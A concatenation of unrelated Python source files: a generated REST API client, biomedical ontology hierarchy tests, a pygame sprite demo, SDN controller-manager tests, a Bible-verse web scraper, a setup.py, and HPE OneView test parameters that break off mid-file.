'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_searches" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `list_searches`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
query_params = []
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'sort' in local_var_params and local_var_params['sort'] is not None: # noqa: E501
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'query' in local_var_params and local_var_params['query'] is not None: # noqa: E501
query_params.append(('query', local_var_params['query'])) # noqa: E501
if 'no_page' in local_var_params and local_var_params['no_page'] is not None: # noqa: E501
query_params.append(('no_page', local_var_params['no_page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/searches', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ListSearchesResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_search(self, owner, search_uuid, body, **kwargs): # noqa: E501
"""Patch search # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_search(owner, search_uuid, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str search_uuid: UUID (required)
:param V1Search body: Search body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1Search
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_search_with_http_info(owner, search_uuid, body, **kwargs) # noqa: E501
def patch_search_with_http_info(self, owner, search_uuid, body, **kwargs): # noqa: E501
"""Patch search # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_search_with_http_info(owner, search_uuid, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str search_uuid: UUID (required)
:param V1Search body: Search body (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1Search, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'search_uuid',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_search" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `patch_search`") # noqa: E501
# verify the required parameter 'search_uuid' is set
if self.api_client.client_side_validation and ('search_uuid' not in local_var_params or # noqa: E501
local_var_params['search_uuid'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `search_uuid` when calling `patch_search`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `patch_search`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'search_uuid' in local_var_params:
path_params['search.uuid'] = local_var_params['search_uuid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/searches/{search.uuid}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Search', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_search(self, owner, search_uuid, body, **kwargs): # noqa: E501
"""Update search # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_search(owner, search_uuid, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str search_uuid: UUID (required)
:param V1Search body: Search body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1Search
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_search_with_http_info(owner, search_uuid, body, **kwargs) # noqa: E501
def update_search_with_http_info(self, owner, search_uuid, body, **kwargs): # noqa: E501
"""Update search # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_search_with_http_info(owner, search_uuid, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str search_uuid: UUID (required)
:param V1Search body: Search body (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1Search, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'search_uuid',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_search" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `update_search`") # noqa: E501
# verify the required parameter 'search_uuid' is set
if self.api_client.client_side_validation and ('search_uuid' not in local_var_params or # noqa: E501
local_var_params['search_uuid'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `search_uuid` when calling `update_search`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `update_search`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'search_uuid' in local_var_params:
path_params['search.uuid'] = local_var_params['search_uuid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/searches/{search.uuid}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Search', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
|
py | b410466f2a7d651f3cf5d6c26ee062a436d1088a | from __future__ import absolute_import, print_function, unicode_literals
from builtins import dict, str
import os
from copy import deepcopy
from indra.util import unicode_strs
from indra.preassembler.hierarchy_manager import hierarchies, \
HierarchyManager, get_bio_hierarchies, YamlHierarchyManager
from indra.preassembler.make_eidos_hume_ontologies import eidos_ont_url, \
rdf_graph_from_yaml, load_yaml_from_url
ent_hierarchy = hierarchies['entity']
mod_hierarchy = hierarchies['modification']
act_hierarchy = hierarchies['activity']
comp_hierarchy = hierarchies['cellular_component']
eidos_ns = 'https://github.com/clulab/eidos/wiki/JSON-LD/Grounding#'
def test_hierarchy_unicode():
# Test all the hierarchies except the comp_hierarchy, which is an
# RDF graph
assert unicode_strs((ent_hierarchy.isa_closure,
ent_hierarchy.partof_closure))
assert unicode_strs((mod_hierarchy.isa_closure,
mod_hierarchy.partof_closure))
assert unicode_strs((act_hierarchy.isa_closure,
act_hierarchy.partof_closure))
def test_isa_entity():
assert ent_hierarchy.isa('HGNC', '1097', 'FPLX', 'RAF')
def test_isa_entity2():
assert not ent_hierarchy.isa('HGNC', '1097', 'HGNC', 'ARAF')
def test_isa_entity3():
assert not ent_hierarchy.isa('FPLX', 'RAF', 'HGNC', '1097')
def test_partof_entity():
assert ent_hierarchy.partof('FPLX', 'HIF_alpha', 'FPLX', 'HIF')
def test_isa_or_partof_entity():
assert ent_hierarchy.isa_or_partof('HGNC', '9385', 'FPLX', 'AMPK')
def test_partof_entity_not():
assert not ent_hierarchy.partof('FPLX', 'HIF1', 'FPLX', 'HIF_alpha')
def test_isa_mod():
assert mod_hierarchy.isa('INDRA_MODS', 'phosphorylation',
'INDRA_MODS', 'modification')
def test_isa_mod_not():
assert not mod_hierarchy.isa('INDRA_MODS', 'phosphorylation',
'INDRA_MODS', 'ubiquitination')
def test_isa_activity():
assert act_hierarchy.isa('INDRA_ACTIVITIES', 'kinase',
'INDRA_ACTIVITIES', 'activity')
def test_isa_activity_not():
assert not act_hierarchy.isa('INDRA_ACTIVITIES', 'kinase',
'INDRA_ACTIVITIES', 'phosphatase')
def test_partof_comp():
assert comp_hierarchy.partof('INDRA_LOCATIONS', 'cytoplasm',
'INDRA_LOCATIONS', 'cell')
def test_partof_comp_not():
assert not comp_hierarchy.partof('INDRA_LOCATIONS', 'cell',
'INDRA_LOCATIONS', 'cytoplasm')
def test_partof_comp_none():
assert comp_hierarchy.partof('INDRA_LOCATIONS', 'cytoplasm',
'INDRA_LOCATIONS', None)
def test_partof_comp_none_none():
assert comp_hierarchy.partof('INDRA_LOCATIONS', None,
'INDRA_LOCATIONS', None)
def test_partof_comp_none_not():
assert not comp_hierarchy.partof('INDRA_LOCATIONS', None,
'INDRA_LOCATIONS', 'cytoplasm')
def test_get_children():
raf = 'http://identifiers.org/fplx/RAF'
braf = 'http://identifiers.org/hgnc.symbol/BRAF'
mapk = 'http://identifiers.org/fplx/MAPK'
ampk = 'http://identifiers.org/fplx/AMPK'
# Look up RAF
rafs = ent_hierarchy.get_children(raf)
# Should get three family members
assert isinstance(rafs, list), rafs
assert len(rafs) == 3
assert unicode_strs(rafs)
# The lookup of a gene-level entity should not return any additional
# entities
brafs = ent_hierarchy.get_children(braf)
assert isinstance(brafs, list)
assert len(brafs) == 0
assert unicode_strs(brafs)
mapks = ent_hierarchy.get_children(mapk)
assert len(mapks) == 12, mapks
assert unicode_strs(mapks)
# Make sure we can also do this in a case involving both family and complex
# relationships
ampks = ent_hierarchy.get_children(ampk)
assert len(ampks) == 22, ampks
ag_none = ''
none_children = ent_hierarchy.get_children('')
assert isinstance(none_children, list)
assert len(none_children) == 0
def test_mtorc_children():
mtorc1 = 'http://identifiers.org/fplx/mTORC1'
mtorc2 = 'http://identifiers.org/fplx/mTORC2'
ch1 = ent_hierarchy.get_children(mtorc1)
ch2 = ent_hierarchy.get_children(mtorc2)
assert 'http://identifiers.org/hgnc.symbol/RICTOR' not in ch1
assert 'http://identifiers.org/hgnc.symbol/RPTOR' not in ch2
def test_mtorc_get_parents():
rictor = 'http://identifiers.org/hgnc/28611' # RICTOR
p = ent_hierarchy.get_parents(rictor, 'all')
assert len(p) == 1
assert list(p)[0] == 'http://identifiers.org/fplx/mTORC2'
def test_mtorc_transitive_closure():
rictor = 'http://identifiers.org/hgnc/28611' # RICTOR
mtorc2 = 'http://identifiers.org/fplx/mTORC2'
assert (rictor, mtorc2) in ent_hierarchy.partof_closure
def test_mtorc_partof_no_tc():
ent_hierarchy_no_tc = deepcopy(ent_hierarchy)
ent_hierarchy_no_tc.isa_closure = {}
ent_hierarchy_no_tc.partof_closure = {}
assert ent_hierarchy_no_tc.partof('HGNC', '30287', 'FPLX', 'mTORC1')
assert not ent_hierarchy_no_tc.partof('HGNC', '30287', 'FPLX', 'mTORC2')
def test_erk_isa_no_tc():
ent_hierarchy_no_tc = deepcopy(ent_hierarchy)
ent_hierarchy_no_tc.isa_closure = {}
ent_hierarchy_no_tc.partof_closure = {}
assert ent_hierarchy_no_tc.isa('HGNC', '6871', 'FPLX', 'MAPK')
assert not ent_hierarchy_no_tc.isa('HGNC', '6871', 'FPLX', 'JNK')
def test_get_parents():
prkaa1 = 'http://identifiers.org/hgnc/9376' # PRKAA1
ampk = 'http://identifiers.org/fplx/AMPK'
p1 = ent_hierarchy.get_parents(prkaa1, 'all')
assert len(p1) == 8, p1
assert ampk in p1
p2 = ent_hierarchy.get_parents(prkaa1, 'immediate')
assert len(p2) == 7, p2
# This is to make sure we're getting an URI string
assert unicode_strs(p2)
assert ampk not in p2
p3 = ent_hierarchy.get_parents(prkaa1, 'top')
assert len(p3) == 1, p3
assert ampk in p3
def test_chebi_isa():
assert ent_hierarchy.isa('CHEBI', 'CHEBI:87307', 'CHEBI', 'CHEBI:36962')
def test_load_eid_hierarchy():
eidos_ont = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'../sources/eidos/eidos_ontology.rdf')
hm = HierarchyManager(eidos_ont, True, True)
assert hm.isa_closure
eidos_isa = lambda a, b: hm.isa('UN', a, 'UN', b)
assert eidos_isa('UN/events/human/conflict',
'UN/events/human')
assert not eidos_isa('UN/events/human/conflict',
'UN/events/human/human_migration')
assert eidos_isa('UN/entities/human/infrastructure',
'UN/entities')
assert eidos_isa('UN/events/natural_disaster/storm',
'UN/events')
assert not eidos_isa('UN/events',
'UN/events/natural/weather/storm')
# Test case where graph is not given
hm = HierarchyManager(None, True, True)
hm.load_from_rdf_file(eidos_ont)
assert eidos_isa('UN/events/natural_disaster/storm',
'UN/events')
# Test loading from string
with open(eidos_ont, 'r') as fh:
hm = HierarchyManager(None, True, True)
hm.load_from_rdf_string(fh.read())
assert eidos_isa('UN/events/natural_disaster/storm',
'UN/events')
# Test loading from Graph
import rdflib
g = rdflib.Graph()
g.parse(eidos_ont, format='nt')
hm = HierarchyManager(None, True, True)
hm.load_from_rdf_graph(g)
assert eidos_isa('UN/events/natural_disaster/storm',
'UN/events')
def test_load_trips_hierarchy():
trips_ont = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'../sources/cwms/trips_ontology.rdf')
hm = HierarchyManager(trips_ont, True, True)
assert hm.isa_closure
trips_isa = lambda a, b: hm.isa('CWMS', a, 'CWMS', b)
assert trips_isa('ONT::TRUCK', 'ONT::VEHICLE')
assert not trips_isa('ONT::VEHICLE', 'ONT::TRUCK')
assert trips_isa('ONT::MONEY', 'ONT::PHYS-OBJECT')
assert trips_isa('ONT::TABLE', 'ONT::MANUFACTURED-OBJECT')
def test_load_sofia_hierarchy():
sofia_ont = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'../sources/sofia/sofia_ontology.rdf')
hm = HierarchyManager(sofia_ont, True, True)
assert hm.isa_closure
sofia_isa = lambda a, b: hm.isa('SOFIA', a, 'SOFIA', b)
assert sofia_isa('Accessibility/Accessibility', 'Accessibility')
assert not sofia_isa('Movement/Transportation', 'Movement/Human_Migration')
assert sofia_isa('Movement/Human_Migration', 'Movement')
def test_load_hume_hierarchy():
hume_ont = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'../sources/hume/hume_ontology.rdf')
hm = HierarchyManager(hume_ont, True, True)
assert hm.isa_closure
hume_isa = lambda a, b: hm.isa('HUME', a, 'HUME', b)
assert hume_isa('entity/academic_discipline', 'entity')
assert not hume_isa('entity', 'entity/academic_discipline')
assert hume_isa('event/healthcare/human_disease',
'event/healthcare')
def test_same_components():
uri_prkag1 = ent_hierarchy.get_uri('HGNC', '9385') # PRKAG1
uri_ampk = ent_hierarchy.get_uri('FPLX', 'AMPK')
c1 = ent_hierarchy.components[uri_prkag1]
c2 = ent_hierarchy.components[uri_ampk]
assert c1 == c2
def test_bio_hierarchy_pickles():
h1 = get_bio_hierarchies()
h2 = get_bio_hierarchies(from_pickle=False)
for key in h1.keys():
assert len(h1[key].graph) == len(h2[key].graph)
def test_yaml_hm():
yml = load_yaml_from_url(eidos_ont_url)
hm = YamlHierarchyManager(yml, rdf_graph_from_yaml)
entry = 'UN/events/natural_disaster/snowpocalypse'
hm.add_entry(entry)
assert hm.isa('UN', entry, 'UN', '/'.join(entry.split('/')[:-1]))
entry = 'UN/events/galactic/alien_invasion'
hm.add_entry(entry)
assert hm.isa('UN', entry, 'UN', '/'.join(entry.split('/')[:-1]))
assert hm.isa('UN', entry, 'UN', '/'.join(entry.split('/')[:-2]))
|
py | b41048086c82504a76dd08bd9cd02209eee9d469 | import pygame
from pygame.sprite import Sprite
import sys
import numpy as np
val = 150
grey = val,val,val
class Square(Sprite):
def __init__(self, SCREEN, border_colour=grey,center_colour=grey,*groups):
super().__init__(*groups)
# super().__init__(self)
self.SCREEN = SCREEN
self.length = 100
self.width = self.length
self.height = self.width
self.image = pygame.Surface([self.width , self.height])
self.image.fill(border_colour)
self.rect = self.image.get_rect()
self.border_size = 20
self.middleBlock = pygame.Surface([int(self.width-self.border_size), int(self.height-self.border_size)])
self.middleBlock.fill(center_colour)
self.middleBlockRect = self.middleBlock.get_rect()
self.middleBlockRect.centerx = self.rect.centerx
self.middleBlockRect.centery = self.rect.centery
self.image.blit(self.middleBlock, self.middleBlockRect)
def update(self, x,y):
# return super().update(*args)
# self.rect.x = int(x)
# self.rect.y = int(y)
self.rect.centerx = int(x)
self.rect.centery = int(y)
def draw(self):
self.SCREEN.blit(self.image, self.rect)
class White(Square):
def __init__(self, SCREEN, *groups):
border_colour=(255,255,255)
center_colour=255,255,0
super().__init__(SCREEN, border_colour=border_colour, center_colour=center_colour, *groups)
class Black(Square):
def __init__(self, SCREEN,*groups):
border_colour=(0,0,0)
center_colour=255,255,0
super().__init__(SCREEN, border_colour=border_colour, center_colour=center_colour, *groups)
def exit():
pygame.quit()
sys.exit()
class Circle():
def __init__(self, number, radius):
super().__init__()
self.N = number
self.r = radius
self.coords = []
self.calc()
def calc(self):
delta_theta = float(2*np.pi/self.N)
theta = float(0)
colour = True
for i in range(0, self.N):
x = self.r*np.cos(theta)
y = self.r*np.sin(theta)
element = []
element.append(x)
element.append(y)
element.append(colour)
self.coords.append(element)
colour = not colour
theta += delta_theta
print(element)
if __name__ == '__main__':
pygame.init()
width, height = 500,500
size = width, height
# val = 150
# grey = val,val,val
SCREEN = pygame.display.set_mode(size)
# sq = Square(SCREEN)
# wh = White(SCREEN)
bl = Black(SCREEN)
cir = Circle(16, 5)
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
exit()
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_q:
exit()
SCREEN.fill(grey)
# bl.update(width/2, height/2)
# bl.draw()
# pygame.draw.rect(SCREEN, (255,0,0), sq.rect)
pygame.display.flip()
|
py | b41048621d0a56098c7fbc54a142cc0a5d171de8 | # Copyright 2014 Ahmed El-Hassany
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from sts.entities.controllers import ControllerConfig
from sts.entities.controllers import POXController
from sts.topology.controllers_manager import ControllersManager
class ControllersManagerTest(unittest.TestCase):
def get_config(self, address='127.0.0.1', port=6633):
start_cmd = ("./pox.py --verbose --no-cli sts.syncproto.pox_syncer "
"--blocking=False openflow.of_01 --address=__address__ "
"--port=__port__")
kill_cmd = ""
cwd = "pox"
config = ControllerConfig(start_cmd=start_cmd, kill_cmd=kill_cmd, cwd=cwd,
address=address, port=port, cid=port)
return config
def get_controller(self, address='127.0.0.1', port=6633):
config = self.get_config(address, port)
ctrl = POXController(controller_config=config)
return ctrl
def test_add_controller(self):
# Arrange
c1 = self.get_controller(port=6633)
c1.start()
c2 = self.get_controller(port=6644)
manager = ControllersManager()
# Act
manager.add_controller(c1)
manager.add_controller(c2)
failed_add1 = lambda: manager.add_controller(c1)
failed_add2 = lambda: manager.add_controller(c2)
# Assert
self.assertIn(c1, manager.controllers)
self.assertIn(c2, manager.controllers)
self.assertIn(c1, manager.live_controllers)
self.assertIn(c2, manager.failed_controllers)
self.assertRaises(AssertionError, failed_add1)
self.assertRaises(AssertionError, failed_add2)
def test_remove_controller(self):
# Arrange
c1 = self.get_controller(port=6633)
c1.start()
c2 = self.get_controller(port=6644)
manager = ControllersManager()
manager.add_controller(c1)
manager.add_controller(c2)
# Act
manager.remove_controller(c1)
manager.remove_controller(c2)
failed_remove1 = lambda: manager.remove_controller(c1)
failed_remove2 = lambda: manager.remove_controller(c2)
# Assert
self.assertNotIn(c1, manager.controllers)
self.assertNotIn(c2, manager.controllers)
self.assertNotIn(c1, manager.live_controllers)
self.assertNotIn(c2, manager.failed_controllers)
self.assertRaises(AssertionError, failed_remove1)
self.assertRaises(AssertionError, failed_remove2)
def test_up_controllers(self):
# Arrange
c1 = self.get_controller(port=6633)
c1.start()
c2 = self.get_controller(port=6644)
manager = ControllersManager()
manager.add_controller(c1)
manager.add_controller(c2)
# Act
# Assert
self.assertIn(c1, manager.up_controllers)
self.assertNotIn(c1, manager.down_controllers)
self.assertIn(c2, manager.down_controllers)
self.assertNotIn(c2, manager.up_controllers)
def test_crash_controller(self):
# Arrange
c1 = self.get_controller(port=6633)
c1.start()
c2 = self.get_controller(port=6644)
c2.start()
manager = ControllersManager()
manager.add_controller(c1)
manager.add_controller(c2)
# Act
manager.crash_controller(c1)
# Assert
self.assertIn(c1, manager.controllers)
self.assertIn(c2, manager.controllers)
self.assertIn(c1, manager.failed_controllers)
self.assertIn(c2, manager.live_controllers)
def test_recover_controller(self):
# Arrange
c1 = self.get_controller(port=6633)
c2 = self.get_controller(port=6644)
manager = ControllersManager()
manager.add_controller(c1)
manager.add_controller(c2)
# Act
manager.recover_controller(c1)
# Assert
self.assertIn(c1, manager.controllers)
self.assertIn(c2, manager.controllers)
self.assertIn(c1, manager.live_controllers)
self.assertIn(c2, manager.failed_controllers)
def test_create_controller(self):
# Arrange
manager = ControllersManager()
# Act
failed = lambda: manager.create_controller('127.0.0.1', 6633)
# Assert
self.assertRaises(AssertionError, failed)
def test_get_controller(self):
# Arrange
c1 = self.get_controller(port=6633)
c2 = self.get_controller(port=6644)
manager = ControllersManager()
manager.add_controller(c1)
manager.add_controller(c2)
# Act
get_c1 = manager.get_controller(6633)
get_c2 = manager.get_controller(6644)
# Assert
self.assertEquals(get_c1, c1)
self.assertEquals(get_c2, c2) |
py | b4104967001b18952936a4e6d65923219c68589c | import requests
import json
import re
from bs4 import BeautifulSoup
bible = "21st Century King James version";
bibleCode = "KJ21";
testament= "old";
book = "Hosea"
chapters = 15;
verses = []
r = '{'
r += '"__collections__": {'
r += '"' + bible + '": {'
r += '"' + book + '": {'
r += '"bible": ' + '"' + bible + '",'
r += '"bible-code": ' + '"' + bibleCode + '",'
r += '"testament": ' + '"' + testament + '",'
r += '"book": ' + '"' + book + '",'
r += '"__collections__" : {'
for a in range(1, chapters):
response = requests.get(
'https://www.biblegateway.com/passage/?search=' + str(book) + '+' + str(a) + '&version=' + str(bibleCode))
html = response.text
soup = BeautifulSoup(html, "html.parser")
r += '"Chapter ' + str(a) + '": {'
for b, tag in enumerate(soup.find_all("p")):
if(str(tag.find_next("span").get("id")) != "None"):
r += '"verse ' + str(b + 1) + '": {'
r += '"verse_id": "' + str(tag.find_next("span").get("id")) + '",'
r += '"verse_number": "' + str(b + 1) + '",'
r += '"chapter": "' + str(tag.find_next("span").get("class")) + '",'
r += '"verse": "' + re.sub('<[^<]+?>', '', str(tag)) + '",'
r += '"raw": ' + json.dumps(str(tag))
if b <= (len(soup.find_all("p")) - 3):
r += '},'
else:
r += '}'
if a <= (chapters-2):
r += '},'
else:
r+= '}'
r += '}'
r += '}'
r += '}'
r += '}'
r += '}'
f = open("dataBackup.txt", "w+")
f.write(r)
f.close()
|
py | b41049a3aa04c64f2e4c60c033cae9d860852a84 | import os
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
requires = [
'selfie',
'executors',
'yaxil',
'matplotlib',
'nibabel',
'scipy'
]
test_requirements = [
]
about = dict()
with open(os.path.join(here, 'boldqc', '__version__.py'), 'r') as f:
exec(f.read(), about)
setup(
name=about['__title__'],
version=about['__version__'],
description=about['__description__'],
author=about['__author__'],
author_email=about['__author_email__'],
url=about['__url__'],
packages=find_packages(),
package_data={
'': ['libexec/*.py', 'libexec/*.sh']
},
include_package_data=True,
scripts=[
'scripts/boldQC.py'
],
install_requires=requires,
tests_require=test_requirements
)
|
py | b4104a4bec0666d91bdb29b7dc6311cf3be19dc9 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
###
# Copyright (2019-2020) Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import pytest
import mock
from copy import deepcopy
from ansible_collections.hpe.oneview.tests.unit.utils.hpe_test_utils import OneViewBaseFactsTest
from ansible_collections.hpe.oneview.tests.unit.utils.oneview_module_loader import ServerProfileFactsModule
ERROR_MSG = 'Fake message error'
ENCLOSURE_GROUP_URI = '/rest/enclosure-groups/3af25c76-dec7-4753-83f6-e1ad06c29a43'
HARDWARE_TYPE_URI = '/rest/server-hardware-types/C8DEF9A6-9586-465E-A951-3070988BC226'
HARDWARE_URI = '/rest/server-hardware/C8DEF9A6-9586-465E-A951-3070988BC226'
PROFILE_URI = '/rest/server-profiles/57d3af2a-b6d2-4446-8645-f38dd808ea4d'
STORAGE_SYSTEM_ID = "TXQ1010307"
PARAMS_GET_ALL = dict(
config='config.json'
)
PARAMS_GET_BY_NAME = dict(
config='config.json',
name="Test Server Profile"
)
PARAMS_GET_BY_URI = dict(
config='config.json',
uri="/rest/fake"
)
PARAMS_WITH_OPTIONS = dict(
config='config.json',
name="Test Server Profile",
options=[
'schema',
'compliancePreview',
'newProfileTemplate',
{'profilePorts': {
'enclosureGroupUri': ENCLOSURE_GROUP_URI,
'serverHardwareTypeUri': HARDWARE_TYPE_URI,
'serverHardwareUri': HARDWARE_URI,
}
},
'messages',
{'transformation': {
'enclosureGroupUri': ENCLOSURE_GROUP_URI,
'serverHardwareTypeUri': HARDWARE_TYPE_URI,
'serverHardwareUri': HARDWARE_URI,
}
},
{'availableNetworks': {
'enclosureGroupUri': ENCLOSURE_GROUP_URI,
'serverHardwareTypeUri': HARDWARE_TYPE_URI,
'serverHardwareUri': HARDWARE_URI,
'view': 'FibreChannel'
}
},
{'availableServers': {
'enclosureGroupUri': ENCLOSURE_GROUP_URI,
'serverHardwareTypeUri': HARDWARE_TYPE_URI,
'profileUri': PROFILE_URI
}
},
{'availableStorageSystem': {
'enclosureGroupUri': ENCLOSURE_GROUP_URI,
'serverHardwareTypeUri': HARDWARE_TYPE_URI,
'storageSystemId': STORAGE_SYSTEM_ID
}
},
{'availableStorageSystems': {
'enclosureGroupUri': ENCLOSURE_GROUP_URI,
'serverHardwareTypeUri': HARDWARE_TYPE_URI,
'start': 1,
'count': 15,
'filter': "\"'status'='OK'\"",
'sort': 'name:ascending'
}
},
{'availableTargets': {
